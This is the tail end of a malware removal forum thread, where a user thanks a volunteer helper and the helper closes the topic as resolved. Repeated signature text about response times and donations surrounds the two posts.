The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif


#13 AbhaySolanki

AbhaySolanki
  • Topic Starter

  • Members
  • 13 posts
  • OFFLINE
  •  

Posted 30 September 2017 - 12:14 AM

No, thank you so much man!!!!!!!!



#14 fireman4it

fireman4it

    Bleepin' Fireman


  • Malware Response Team
  • 13,505 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Greenup, Ill USA
  • Local time:03:56 PM

Posted 04 October 2017 - 06:52 AM

It appears that this issue is resolved, therefore I am closing the topic. If that is not the case and you need or wish to continue with this topic, please send me or any Moderator a Personal Message (PM) that you would like this topic re-opened.

" Extinguishing Malware from the world"

The Virus, Trojan, Spyware, and Malware Removal forum is very busy. If I'm helping you and I've not posted back within 24 hrs., send a PM with your topic link. Thank you.

ALL OTHER HELP REQUESTS VIA THE PM SYSTEM WILL BE IGNORED. The Forums are there for a reason!
Thanks-


  userbar_eis_500.gif

If I have helped you, consider making a donation to help me continue the fight against Malware! Just click btn_donate_LG.gif




